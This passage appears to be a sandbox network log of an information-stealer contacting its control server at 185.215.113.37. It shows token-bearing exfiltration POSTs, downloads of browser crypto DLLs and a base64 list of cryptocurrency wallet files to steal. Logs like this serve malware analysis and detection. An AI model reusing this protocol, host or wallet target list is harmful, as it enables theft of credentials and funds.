@0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Sep 26, 2024 00:39:03.752954006 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHJEBGIEBFIJKEBFBFHI Host: 185.215.113.37 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 00:39:04.499620914 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:03 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 00:39:04.597801924 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCF Host: 185.215.113.37 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 00:39:05.711843014 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:04 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 00:39:05.711867094 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:04 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 00:39:05.727009058 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHCBAAEHCFIDGDHJEHC Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 66 32 33 30 61 30 30 36 63 36 61 39 34 36 30 64 33 37 33 64 65 33 65 66 64 64 66 37 62 35 37 39 36 66 64 36 32 66 64 63 62 32 36 63 35 38 64 35 30 33 35 63 35 66 30 33 64 37 32 66 38 39 30 35 62 34 66 37 66 61 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 43 42 41 41 45 48 43 46 49 44 47 44 48 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------DGHCBAAEHCFIDGDHJEHCContent-Disposition: form-data; name="token"3f230a006c6a9460d373de3efddf7b5796fd62fdcb26c58d5035c5f03d72f8905b4f7faa------DGHCBAAEHCFIDGDHJEHCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DGHCBAAEHCFIDGDHJEHCContent-Disposition: form-data; name="file"------DGHCBAAEHCFIDGDHJEHC--
Sep 26, 2024 00:39:06.441366911 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:05 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 00:39:06.840454102 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKKJKFBKKECFHJKEBKEH Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 66 32 33 30 61 30 30 36 63 36 61 39 34 36 30 64 33 37 33 64 65 33 65 66 64 64 66 37 62 35 37 39 36 66 64 36 32 66 64 63 62 32 36 63 35 38 64 35 30 33 35 63 35 66 30 33 64 37 32 66 38 39 30 35 62 34 66 37 66 61 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------BKKJKFBKKECFHJKEBKEHContent-Disposition: form-data; name="token"3f230a006c6a9460d373de3efddf7b5796fd62fdcb26c58d5035c5f03d72f8905b4f7faa------BKKJKFBKKECFHJKEBKEHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BKKJKFBKKECFHJKEBKEHContent-Disposition: form-data; name="file"------BKKJKFBKKECFHJKEBKEH--
Sep 26, 2024 00:39:07.558115005 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:06 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 00:39:07.825541973 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 00:39:08.047954082 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:07 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Sep 26, 2024 00:39:09.051238060 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 00:39:09.274636984 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:09 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Sep 26, 2024 00:39:10.291695118 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 00:39:10.612706900 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:10 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Sep 26, 2024 00:39:11.275847912 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 00:39:11.496140003 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:11 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Sep 26, 2024 00:39:15.060502052 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 00:39:15.284315109 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:15 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Sep 26, 2024 00:39:15.899105072 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 00:39:16.187320948 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:16 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Sep 26, 2024 00:39:17.162790060 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEHCFIDHIDGIDHJEHID Host: 185.215.113.37 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 00:39:18.049762011 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:17 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 00:39:18.108078957 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFIIEHJDBKJKECBFHDG Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 66 32 33 30 61 30 30 36 63 36 61 39 34 36 30 64 33 37 33 64 65 33 65 66 64 64 66 37 62 35 37 39 36 66 64 36 32 66 64 63 62 32 36 63 35 38 64 35 30 33 35 63 35 66 30 33 64 37 32 66 38 39 30 35 62 34 66 37 66 61 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 2d 2d 0d 0a Data Ascii: ------CBFIIEHJDBKJKECBFHDGContent-Disposition: form-data; name="token"3f230a006c6a9460d373de3efddf7b5796fd62fdcb26c58d5035c5f03d72f8905b4f7faa------CBFIIEHJDBKJKECBFHDGContent-Disposition: form-data; name="message"wallets------CBFIIEHJDBKJKECBFHDG--
Sep 26, 2024 00:39:18.331381083 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:18 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Sep 26, 2024 00:39:18.334311962 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJDHJKFIECAAKFIJJKJ Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 66 32 33 30 61 30 30 36 63 36 61 39 34 36 30 64 33 37 33 64 65 33 65 66 64 64 66 37 62 35 37 39 36 66 64 36 32 66 64 63 62 32 36 63 35 38 64 35 30 33 35 63 35 66 30 33 64 37 32 66 38 39 30 35 62 34 66 37 66 61 61 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="token"3f230a006c6a9460d373de3efddf7b5796fd62fdcb26c58d5035c5f03d72f8905b4f7faa------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="message"ybncbhylepme------EHJDHJKFIECAAKFIJJKJ--
Sep 26, 2024 00:39:18.579777956 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:18 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7018 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 2a 2e 70 6c 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6f 66 66 69 63 65 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 